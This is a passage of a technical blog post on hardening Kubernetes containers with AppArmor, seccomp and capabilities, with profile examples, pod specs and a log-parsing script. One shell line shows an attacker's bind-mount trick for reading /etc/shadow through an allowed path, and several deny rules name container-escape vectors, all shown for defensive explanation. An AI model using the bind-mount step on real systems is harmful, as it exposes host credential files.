      <description>&lt;p&gt;You've read the Kubernetes security docs. You know to set &lt;code&gt;appArmorProfile: RuntimeDefault&lt;/code&gt; and &lt;code&gt;seccompProfile: RuntimeDefault&lt;/code&gt;. You've ticked the CIS Benchmark boxes. And yet, if a container in your cluster were compromised right now, you might be surprised by what these controls would — and wouldn't — stop.&lt;/p&gt;

&lt;p&gt;This post is for engineers who've moved past configuration and want to reason about AppArmor and seccomp under pressure: their real enforcement models, where each fails, how they interact, how to manage them at scale, and what breaks first in production.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;If you haven't read the companion post on syscalls&lt;/strong&gt; — &lt;a href="https://platformwale.blog/2026/03/18/syscalls-in-kubernetes-the-invisible-layer-that-runs-everything/" rel="noopener noreferrer"&gt;Syscalls in Kubernetes: The Invisible Layer That Runs Everything&lt;/a&gt; — the enforcement mechanics below will make more sense with that foundation. Both controls operate on the syscall path; understanding &lt;em&gt;what a syscall is and how it traverses the kernel&lt;/em&gt; is prerequisite context.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Table of Contents
&lt;/h2&gt;

&lt;ol&gt;
&lt;li&gt;Why Platform Teams Should Care&lt;/li&gt;
&lt;li&gt;How the Kernel Enforces Security: Not a Pipeline&lt;/li&gt;
&lt;li&gt;From Syscall to Enforcement: The Full Execution Path&lt;/li&gt;
&lt;li&gt;The Runtime Default Trap&lt;/li&gt;
&lt;li&gt;Managing Profiles at Scale: Declarative or Nothing&lt;/li&gt;
&lt;li&gt;
Writing a Real Profile: The Rule Model

&lt;ul&gt;
&lt;li&gt;The Path-Based Trap&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;What AppArmor Won't Stop&lt;/li&gt;
&lt;li&gt;
AppArmor vs. Seccomp vs. SELinux: An Opinionated Take

&lt;ul&gt;
&lt;li&gt;Choosing AppArmor vs. SELinux at Platform Level&lt;/li&gt;
&lt;li&gt;Control Failure Mode Comparison&lt;/li&gt;
&lt;li&gt;When Is seccomp Alone Enough?&lt;/li&gt;
&lt;li&gt;LSM Stacking: The Frontier&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
Seccomp: Deeper Than You Think

&lt;ul&gt;
&lt;li&gt;The cBPF Filter Model&lt;/li&gt;
&lt;li&gt;Return Actions (More Than Allow/Deny)&lt;/li&gt;
&lt;li&gt;Argument Filtering: The Underused Power Feature&lt;/li&gt;
&lt;li&gt;Two Non-Obvious Properties&lt;/li&gt;
&lt;li&gt;What Seccomp Won't Stop&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;A Threat Scenario: Container Escape Attempt&lt;/li&gt;
&lt;li&gt;What Breaks First in Production&lt;/li&gt;
&lt;li&gt;Performance Considerations&lt;/li&gt;
&lt;li&gt;A Production-Grade Pod Spec&lt;/li&gt;
&lt;li&gt;Observability: Catching Denials Before They Become Incidents&lt;/li&gt;
&lt;li&gt;Compliance Mapping&lt;/li&gt;
&lt;li&gt;A Realistic Failure Postmortem&lt;/li&gt;
&lt;li&gt;AppArmor's Threat Model Boundary&lt;/li&gt;
&lt;li&gt;The Operational Cost of AppArmor&lt;/li&gt;
&lt;li&gt;Common Anti-Patterns&lt;/li&gt;
&lt;li&gt;Platform Team Playbook&lt;/li&gt;
&lt;li&gt;Designing for Control Failure&lt;/li&gt;
&lt;li&gt;Key Takeaways&lt;/li&gt;
&lt;li&gt;The Real Purpose of AppArmor&lt;/li&gt;
&lt;li&gt;If You Remember Only One Thing Per Control&lt;/li&gt;
&lt;li&gt;Closing Thoughts&lt;/li&gt;
&lt;/ol&gt;





&lt;h2&gt;
  
  
  Why Platform Teams Should Care
&lt;/h2&gt;

&lt;p&gt;Most Kubernetes clusters already run with several security controls in place:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pod Security Standards at admission&lt;/li&gt;
&lt;li&gt;seccomp &lt;code&gt;RuntimeDefault&lt;/code&gt; filtering syscalls&lt;/li&gt;
&lt;li&gt;NetworkPolicies governing traffic paths&lt;/li&gt;
&lt;li&gt;RBAC limiting API surface&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;So why add AppArmor to that stack?&lt;/p&gt;

&lt;p&gt;Because those controls primarily restrict &lt;em&gt;what a container can ask the kernel to do&lt;/em&gt; — not &lt;em&gt;what resources it can access once it's running&lt;/em&gt;. AppArmor fills a specific gap in that model:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Control&lt;/th&gt;
&lt;th&gt;What it restricts&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Capabilities&lt;/td&gt;
&lt;td&gt;Privileged kernel operations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Seccomp&lt;/td&gt;
&lt;td&gt;Syscall invocation surface&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NetworkPolicy&lt;/td&gt;
&lt;td&gt;Network ingress/egress paths&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;AppArmor&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Filesystem + kernel object access&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;For platform teams operating multi-tenant clusters, this gap matters for two distinct reasons:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Containment.&lt;/strong&gt; A compromised container running under a tight AppArmor profile cannot read &lt;code&gt;/etc/shadow&lt;/code&gt;, traverse &lt;code&gt;/proc/*/maps&lt;/code&gt;, write to &lt;code&gt;/sys/kernel/**&lt;/code&gt;, or access service account tokens it wasn't explicitly granted. The blast radius of a post-exploitation scenario is substantially smaller.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Detection signal.&lt;/strong&gt; AppArmor denials fire early. When an attacker inside a container attempts reconnaissance — reading process maps, accessing credential paths, probing kernel interfaces — they hit AppArmor rules before they hit application-level controls. In many real incidents, AppArmor denial logs are the first signal that something is wrong, appearing minutes before behavioral anomalies surface in application logs.&lt;/p&gt;

&lt;p&gt;Without mandatory access controls like AppArmor or SELinux, a compromised container often has far broader read access to the host filesystem and &lt;code&gt;/proc&lt;/code&gt; namespace than platform teams realize — even under PSS &lt;code&gt;Restricted&lt;/code&gt;. AppArmor is the layer that makes that access explicit and auditable.&lt;/p&gt;





&lt;h2&gt;
  
  
  How the Kernel Enforces Security: Not a Pipeline
&lt;/h2&gt;

&lt;p&gt;A common mental model is that capabilities, AppArmor, and seccomp form an ordered enforcement stack. That's a useful simplification, but it's not how the kernel works — and the difference matters when you're reasoning about bypasses.&lt;/p&gt;

&lt;p&gt;All three are enforced inside the Linux kernel, but at different enforcement points with different objects:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Capabilities&lt;/strong&gt; gate privileged operations at the point they're requested (e.g., &lt;code&gt;CAP_NET_BIND_SERVICE&lt;/code&gt; before binding to a port below 1024).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Seccomp&lt;/strong&gt; intercepts syscalls before they execute, using a BPF filter to allow, deny, or trap them.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AppArmor&lt;/strong&gt; is a Linux Security Module (LSM) that hooks into kernel object access — mediating access to files, sockets, capabilities, and IPC based on a per-process policy.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;There is no strict serial pipeline. A single process action may be evaluated by all three during one operation, each at its own hook point.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1peeu6gyx3s5ftp68rxi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1peeu6gyx3s5ftp68rxi.png" alt="image" width="800" height="734"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;AppArmor is uniquely path-aware in a way that neither capabilities nor seccomp are — it can express "this process may read &lt;code&gt;/etc/nginx/**&lt;/code&gt; but not &lt;code&gt;/etc/passwd&lt;/code&gt;" — which is why it complements rather than duplicates the others.&lt;/p&gt;
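&lt;p&gt;That rule translates almost literally into profile syntax. A minimal illustrative fragment — not a complete policy:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;profile nginx-sketch flags=(enforce) {
  #include &amp;lt;abstractions/base&amp;gt;

  /etc/nginx/** r,       # reads allowed under /etc/nginx
  deny /etc/passwd r,    # explicit deny overrides any broader allow
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;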





&lt;h2&gt;
  
  
  From Syscall to Enforcement: The Full Execution Path
&lt;/h2&gt;

&lt;p&gt;Before diving into each control individually, it's worth being precise about &lt;em&gt;when&lt;/em&gt; each fires. The ordering matters when you're reasoning about bypasses — and it's commonly misunderstood.&lt;/p&gt;

&lt;p&gt;When a container process makes a syscall, here's the actual sequence inside the kernel:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User Process
   │
   └── syscall()            ← ring 3 → ring 0 transition
         │
         ├── seccomp filter (classic BPF)
         │        │
         │        ├── KILL / ERRNO / TRAP / NOTIFY → blocked here; syscall logic never runs
         │        └── ALLOW → continue
         │
         ├── kernel executes syscall logic
         │        │
         │        └── LSM hooks fire (AppArmor / SELinux)
         │                 │
         │                 ├── path / capability / network label check
         │                 └── DENY → EACCES, operation aborted
         │
         ├── capability checks (if privileged op requested)
         │        │
         │        └── e.g. CAP_SYS_ADMIN for mount(), CAP_NET_RAW for raw sockets
         │
         └── actual resource access (filesystem, network, IPC)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The critical implication: &lt;strong&gt;seccomp executes before LSM hooks&lt;/strong&gt;. In most common syscall paths, seccomp is evaluated at syscall entry, followed by LSM hooks (AppArmor/SELinux) and capability checks during operation-specific validation — the exact interleaving varies by syscall and operation type, but the invariant that matters is: a syscall denied by seccomp never reaches the AppArmor evaluation point. Conversely, a syscall allowed by seccomp is still subject to AppArmor's access controls on what that syscall can touch.&lt;/p&gt;

&lt;p&gt;Capabilities complete the triad. They're evaluated alongside LSM hooks for many operations and gate the &lt;em&gt;privilege level&lt;/em&gt; of what a process can do — independent of both which syscalls it can invoke (seccomp) and which objects it can access (AppArmor). In practice, dropping capabilities is often the simplest way to eliminate entire exploit paths before seccomp or AppArmor need to engage. Dropping &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; removes more attack surface with one line than most seccomp tuning achieves:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Seccomp&lt;/strong&gt; → reduce what the kernel will execute&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AppArmor&lt;/strong&gt; → reduce what processes can access&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Capabilities&lt;/strong&gt; → reduce what processes are privileged to do&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is why the three controls are complementary by design, not redundant:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Seccomp&lt;/strong&gt; answers: &lt;em&gt;can this syscall be invoked at all?&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AppArmor&lt;/strong&gt; answers: &lt;em&gt;given this syscall is allowed, what can it operate on?&lt;/em&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Capabilities&lt;/strong&gt; answers: &lt;em&gt;does this process hold the privilege required for this operation?&lt;/em&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;A workload with all three configured correctly gets seccomp narrowing the callable surface, capabilities bounding privilege, then AppArmor restricting what permitted syscalls can reach. Remove any layer and the others become your only backstop.&lt;/p&gt;
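&lt;p&gt;As a sketch, all three layers in one container spec — the native &lt;code&gt;appArmorProfile&lt;/code&gt; field requires Kubernetes 1.30+; older clusters use the &lt;code&gt;container.apparmor.security.beta.kubernetes.io&lt;/code&gt; annotation instead:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;containers:
- name: app
  securityContext:
    seccompProfile:
      type: RuntimeDefault      # narrow the callable syscall surface
    appArmorProfile:
      type: RuntimeDefault      # restrict what allowed syscalls can reach
    capabilities:
      drop: ["ALL"]             # bound privilege
    allowPrivilegeEscalation: false
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;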

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AppArmor reduces blast radius. Seccomp reduces reachable attack surface.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;These are different threat properties. Seccomp blocking &lt;code&gt;mount()&lt;/code&gt; means the exploit path requiring &lt;code&gt;mount()&lt;/code&gt; simply cannot execute — the kernel never sees it. AppArmor can't block a syscall entirely (it operates after kernel entry), but it can block every &lt;em&gt;object&lt;/em&gt; that syscall would have reached. They defend different dimensions.&lt;/p&gt;

&lt;p&gt;One insight that gets lost in feature comparisons: most container escapes don't bypass all controls — they exploit the &lt;strong&gt;gaps between them&lt;/strong&gt;. CVE-2022-0492 required &lt;code&gt;unshare()&lt;/code&gt; and &lt;code&gt;mount()&lt;/code&gt; in sequence; seccomp's RuntimeDefault blocked &lt;code&gt;mount()&lt;/code&gt;, AppArmor's default profile independently denied it too. Either layer alone would have stopped the exploit. Security failures are rarely about a single mechanism failing — they're about assumptions breaking at the boundaries between seccomp, LSMs, and capabilities. Understanding those boundaries is what this article is actually about.&lt;/p&gt;





&lt;h2&gt;
  
  
  The Runtime Default Trap
&lt;/h2&gt;

&lt;p&gt;&lt;code&gt;RuntimeDefault&lt;/code&gt; is not a single profile. It's an instruction to the container runtime to apply &lt;em&gt;its own&lt;/em&gt; default profile — and that profile differs across runtimes.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;containerd&lt;/strong&gt; generates its default profile in code and loads it as &lt;code&gt;cri-containerd.apparmor.d&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CRI-O&lt;/strong&gt; ships its own &lt;code&gt;crio-default&lt;/code&gt; profile, maintained independently with its own modifications.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Docker&lt;/strong&gt; uses its own &lt;code&gt;docker-default&lt;/code&gt; profile (relevant in non-Kubernetes contexts).&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Modern runtimes have largely converged on a similar baseline, but differences still exist in rule ordering, abstraction includes, and which operations are allowed. In hardened environments, those deltas matter — you're reasoning about a security envelope you don't fully control.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi6mksarg3ut2mkp16hyk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi6mksarg3ut2mkp16hyk.png" alt="image" width="800" height="449"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The only way to get a consistent, auditable security envelope is to manage your own &lt;code&gt;Localhost&lt;/code&gt; profiles:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;appArmorProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Localhost&lt;/span&gt;
    &lt;span class="na"&gt;localhostProfile&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-org/nginx-v2&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That &lt;code&gt;localhostProfile&lt;/code&gt; value is the name of a profile already loaded into the node's kernel — typically from a file under &lt;code&gt;/etc/apparmor.d/&lt;/code&gt; — not a file path Kubernetes resolves for you. Which brings us to the hard problem: getting profiles onto nodes reliably.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The platform implication for multi-cluster environments:&lt;/strong&gt; two clusters running identical pod manifests can have subtly different effective security envelopes depending on their runtime. This creates configuration drift that is largely invisible in CI pipelines — a security review comparing manifests will see the same &lt;code&gt;RuntimeDefault&lt;/code&gt; annotation, but the actual enforcement may differ. The only reliable mitigation is to treat profiles as versioned infrastructure and manage them declaratively, as covered in the next section.&lt;/p&gt;
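
&lt;p&gt;One way to detect that drift is to check the confinement the runtime &lt;em&gt;actually&lt;/em&gt; applied, rather than trusting the manifest. A quick sketch — the pod name is illustrative, and it assumes the image ships &lt;code&gt;cat&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Inside the container: the kernel's own view of PID 1's confinement
kubectl exec my-pod -- cat /proc/1/attr/current
# e.g. "cri-containerd.apparmor.d (enforce)" on containerd nodes

# On the node: list every loaded profile and its mode
sudo aa-status
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Comparing that output across clusters makes the runtime-default delta concrete instead of theoretical.&lt;/p&gt;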





&lt;h2&gt;
  
  
  Managing Profiles at Scale: Declarative or Nothing
&lt;/h2&gt;

&lt;p&gt;The naive approach is a DaemonSet that writes profile files and runs &lt;code&gt;apparmor_parser -r&lt;/code&gt;. This works until it doesn't — profile updates require careful ordering, new nodes joining the cluster won't have profiles until the DaemonSet pod schedules there, and you have no audit trail.&lt;/p&gt;

&lt;p&gt;At cluster scale, profile lifecycle must be reconciled declaratively. The &lt;strong&gt;&lt;a href="https://github.com/kubernetes-sigs/security-profiles-operator" rel="noopener noreferrer"&gt;Security Profiles Operator (SPO)&lt;/a&gt;&lt;/strong&gt; is currently the most production-ready implementation of that model — a Kubernetes-native controller that manages AppArmor (and seccomp) profiles as first-class CRDs.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frfcgfmbi5hd27xhghpcm.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frfcgfmbi5hd27xhghpcm.png" alt="image" width="800" height="317"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;SPO reconciles profiles onto nodes, surfaces violations as Kubernetes events, and integrates with OPA/Gatekeeper to enforce that pods only reference profiles that are actually loaded. It also supports profile recording — observing a running workload and generating a profile from its real behavior — which is invaluable for brownfield workloads.&lt;/p&gt;

&lt;p&gt;Here's what a real SPO-managed &lt;code&gt;AppArmorProfile&lt;/code&gt; CRD looks like for an nginx container. The Kubernetes metadata section is standard — &lt;code&gt;name&lt;/code&gt; and &lt;code&gt;namespace&lt;/code&gt; are how pods reference the profile. The &lt;code&gt;spec.policy&lt;/code&gt; field is a raw AppArmor policy written in AppArmor's own language, which SPO renders onto each node and loads into the kernel:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;security-profiles-operator.x-k8s.io/v1alpha1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;AppArmorProfile&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;nginx-restricted&lt;/span&gt;       &lt;span class="c1"&gt;# pods reference this name in appArmorProfile.localhostProfile&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;        &lt;span class="c1"&gt;# profile is scoped to this namespace&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;policy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;#include &amp;lt;tunables/global&amp;gt;  # defines @{PROC}, @{HOME} and other path variables&lt;/span&gt;
    &lt;span class="s"&gt;profile nginx-restricted flags=(attach_disconnected) {&lt;/span&gt;
      &lt;span class="s"&gt;# attach_disconnected: allow profile to apply even if the binary path&lt;/span&gt;
      &lt;span class="s"&gt;# isn't reachable at load time (common in containers with overlayfs)&lt;/span&gt;

      &lt;span class="s"&gt;#include &amp;lt;abstractions/base&amp;gt;        # allows libc, locale files, /dev/null etc.&lt;/span&gt;
      &lt;span class="s"&gt;#include &amp;lt;abstractions/nameservice&amp;gt; # allows DNS resolution (/etc/resolv.conf, nsswitch)&lt;/span&gt;

      &lt;span class="s"&gt;# Allow outbound TCP only — no UDP, no raw sockets&lt;/span&gt;
      &lt;span class="s"&gt;network inet tcp,&lt;/span&gt;
      &lt;span class="s"&gt;network inet6 tcp,&lt;/span&gt;

      &lt;span class="s"&gt;# Binary: map+read+execute (mr). Denies writes to the nginx binary itself.&lt;/span&gt;
      &lt;span class="s"&gt;/usr/sbin/nginx mr,&lt;/span&gt;

      &lt;span class="s"&gt;/etc/nginx/** r,          # read-only access to all nginx config files&lt;/span&gt;
      &lt;span class="s"&gt;/var/log/nginx/** w,      # write access for access/error logs&lt;/span&gt;
      &lt;span class="s"&gt;/var/cache/nginx/** rw,   # read+write for proxy cache and temp files&lt;/span&gt;
      &lt;span class="s"&gt;/tmp/** rw,               # read+write for nginx temp upload/body buffers&lt;/span&gt;

      &lt;span class="s"&gt;# Explicit denials — these take precedence over any allow rules above&lt;/span&gt;
      &lt;span class="s"&gt;deny /proc/sys/kernel/core_pattern w,  # prevent overwriting core dump handler (container escape vector)&lt;/span&gt;
      &lt;span class="s"&gt;deny @{PROC}/*/mem rw,                 # prevent reading/writing any process's memory&lt;/span&gt;
      &lt;span class="s"&gt;deny /sys/** w,                        # prevent writing to sysfs (kernel tunable manipulation)&lt;/span&gt;
    &lt;span class="s"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
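
&lt;p&gt;To bind a workload to that profile, the pod references it by name. A hedged sketch — verify the exact on-node profile name with &lt;code&gt;aa-status&lt;/code&gt; first, since SPO versions differ in how they name loaded profiles:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;apiVersion: v1
kind: Pod
metadata:
  name: nginx
  namespace: production
spec:
  containers:
  - name: nginx
    image: nginx:1.27            # illustrative image tag
    securityContext:
      appArmorProfile:
        type: Localhost
        localhostProfile: nginx-restricted   # must match a profile loaded on the node
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;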







&lt;h2&gt;
  
  
  Writing a Real Profile: The Rule Model
&lt;/h2&gt;

&lt;p&gt;AppArmor rules follow a simple pattern: &lt;code&gt;[qualifier] [resource] [permissions]&lt;/code&gt;. But the devil is in the details — particularly the path model.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# File rules
/etc/nginx/** r          # read all files under /etc/nginx
/var/log/nginx/*.log w   # write to log files
/tmp/nginx-*/ rw         # read/write temp directories
/run/nginx.pid rw        # read/write PID file

# Capability rules
capability net_bind_service,   # allow binding to ports &amp;lt; 1024
capability dac_override,       # override file permission checks (avoid if possible)

# Network rules
network inet tcp,
network inet6 tcp,
deny network raw,              # deny raw sockets explicitly

# Deny dangerous kernel paths explicitly
deny /proc/sys/kernel/** w,
deny @{PROC}/*/maps r,         # prevent reading process memory maps (deny overrides any allow)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A profile worth deploying has explicit &lt;code&gt;deny&lt;/code&gt; rules, not just allows. AppArmor profiles are already default-deny — anything no rule permits is refused — but an explicit &lt;code&gt;deny&lt;/code&gt; takes precedence over every allow rule, including allows pulled in by &lt;code&gt;#include&lt;/code&gt; abstractions, making it your backstop against overly broad includes and profile inheritance tricks.&lt;/p&gt;
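
&lt;p&gt;A small illustration of that precedence — the glob grants broad write access, and the deny carves a subtree back out (paths illustrative):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;/var/log/nginx/** rw,             # broad allow for the whole log tree
deny /var/log/nginx/audit/** w,   # deny wins: no writes here, despite the glob above

#include &amp;lt;abstractions/base&amp;gt;      # abstractions can add allows you didn't write...
deny /dev/shm/** wx,              # ...an explicit deny overrides those too
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;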


&lt;h3&gt;
  
  
  The Path-Based Trap
&lt;/h3&gt;

&lt;p&gt;AppArmor evaluates rules against &lt;strong&gt;resolved path strings&lt;/strong&gt;, not inodes. This is a non-obvious but important limitation.&lt;/p&gt;

&lt;p&gt;If an attacker inside a container can manipulate how paths resolve — through bind mounts, symlinks, or mount namespace tricks — they may be able to access a file via an allowed path that reaches an inode your policy intended to restrict. For example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# If /allowed-dir is permitted and an attacker can bind-mount /etc/shadow there:&lt;/span&gt;
mount &lt;span class="nt"&gt;--bind&lt;/span&gt; /etc/shadow /allowed-dir/shadow   &lt;span class="c"&gt;# now readable via allowed path&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Well-written profiles must pair with &lt;code&gt;readOnlyRootFilesystem: true&lt;/code&gt; and careful namespace configuration to close this class of bypass. It's not a reason to avoid AppArmor, but it's a reason to understand what you're actually enforcing.&lt;/p&gt;
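
&lt;p&gt;In pod terms, the pairing looks like this — a sketch of the mitigating &lt;code&gt;securityContext&lt;/code&gt;, not a complete hardening baseline:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;securityContext:
  readOnlyRootFilesystem: true      # removes most writable paths an attacker could bind over
  allowPrivilegeEscalation: false
  capabilities:
    drop: ["ALL"]                   # without CAP_SYS_ADMIN, mount(2) fails regardless of path rules
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;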

&lt;p&gt;&lt;strong&gt;Generating a starting profile&lt;/strong&gt;: Use &lt;code&gt;aa-genprof&lt;/code&gt; to record behavior in complain mode, then tighten from there. For containers, SPO's profile recording is cleaner.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Load a profile in complain mode (logs denials, doesn't enforce)&lt;/span&gt;
apparmor_parser &lt;span class="nt"&gt;-C&lt;/span&gt; /etc/apparmor.d/my-profile

&lt;span class="c"&gt;# Watch would-be denials in real time&lt;/span&gt;
journalctl &lt;span class="nt"&gt;-k&lt;/span&gt; &lt;span class="nt"&gt;-f&lt;/span&gt; | &lt;span class="nb"&gt;grep &lt;/span&gt;apparmor
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
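
&lt;p&gt;At any real volume, grepping gives way to structured parsing. A minimal Python sketch that splits denial lines into fields — the sample follows typical audit output, but field sets vary by kernel and operation:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import re

# key="value" or key=value pairs as they appear in AppArmor audit lines
_PAIR = re.compile(r'(\w+)=(".*?"|\S+)')

def parse_denial(line: str) -&amp;gt; dict:
    """Extract key=value fields from an AppArmor audit line."""
    return {k: v.strip('"') for k, v in _PAIR.findall(line)}

sample = ('audit: type=1400 apparmor="DENIED" operation="open" '
          'profile="nginx-restricted" name="/etc/shadow" pid=1234 '
          'comm="nginx" requested_mask="r" denied_mask="r"')

fields = parse_denial(sample)
print(fields["profile"], fields["name"], fields["denied_mask"])
# nginx-restricted /etc/shadow r
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

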